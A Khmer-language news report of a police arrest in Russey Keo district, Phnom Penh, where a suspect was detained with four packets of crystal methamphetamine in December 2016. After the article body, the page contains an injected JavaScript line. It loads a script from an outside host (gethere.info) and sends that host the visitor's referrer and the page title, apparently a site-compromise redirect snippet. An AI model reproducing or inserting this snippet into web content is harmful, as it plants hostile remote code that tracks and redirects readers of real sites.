Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

សមត្ថកិច្ចខណ្ឌឬស្សីកែវឃាត់ខ្លួនមុខសញ្ញាម្នាក់ដកហូតថ្នាំញៀន៤កញ្ចប់

ភ្នំពេញ៖ ជនសង្ស័យម្នាក់និងថ្នាំញៀន៤កញ្ចប់ ត្រូវបានកម្លាំងនគរបាលខណ្ឌឬស្សីកែវចាប់វាយខ្នោះ ដោយសារតែរូបគេបានរក្សាទុកនូវសារធាតុញៀន។ ហេតុការណ៏នៃការឃាត់ខ្លួននេះបានធ្វើឡើងកាលពីវេលាម៉ោង១០និង៥០នាទីយប់ ថ្ងៃទី១១​ ខែធ្នូ ឆ្នាំ២០១៦ នៅចំណុចផ្លូវរថភ្លើង កែងផ្លូវ​លេខ​៧០ ក្រុមទី០៩ ភូមិទួលសង្កែ សង្កាត់ទួលសង្កែ ខណ្ឌឬស្សីកែវ។

 

លោកណយ ច័ន្ទណារ័ត្ន មន្ត្រីព្រហ្មទណ្ឌខណ្ឌឬស្សីកែវ បានអោយដឹងថាជនសង្ស័យដែលកម្លាំងសមត្ថកិច្ចឃាត់នោះមានឈ្មោះ​វ៉ៅ វិចិត្រ អាយុ២៨ឆ្នាំ ជនជាតិខែ្មរ ទីលំនៅ និង មុខរបរមិនពិតប្រាកដ និងបានដកហូតនៅម្សៅក្រាមពណ៌(ស)ថ្លា ថ្នាំញៀនចំនួន០៤កញ្ចប់ថង់តូច។
មន្ត្រីព្រហ្មទណ្ឌរូបនេះបានអោយដឹងថា ខណ:នៅវេលាម៉ោងខាងលើកម្លាំងល្បាតខណ្ឌឬស្សីកែវ មាននគរបាលប៉ុស្តិ៍ និងប្រជាការពារសង្កាត់ឬស្សីកែវ កំពុងល្បាតដើម្បីទប់ស្កាត់បទល្មើសក្នុងមូលដ្ឋានក៏ប្រទះឃើញមុខសញ្ញាសង្ស័យ ហើយត្រួតពិនិត្យរកឃើញម្សៅពណ៌សរថ្លា​សារធាតុញៀនប្រភេទម៉ាទឹកកក០៤កញ្ចប់នៅនឹងខ្លួនជនសង្ស័យតែម្តង រួចសមត្ថកិច្ចយើងបានឃាត់ខ្លួនយកមកប៉ុស្តិ៏នគរបាលដើម្បីធ្វើការសាកសួរបន្ត។

បច្ចុប្បន្នជនសង្ស័យខាងលើ ត្រូវកម្លាំងសមត្ថកិច្ចឃុំខ្លួនជាបណ្តោះអាសន្ននៅអធិការដ្ឋានដើម្បីកសាងសំណុំរឿងបញ្ជូនទៅកាន់តុលាការចាត់ការតាមនិតីវិធីច្បាប់ ៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More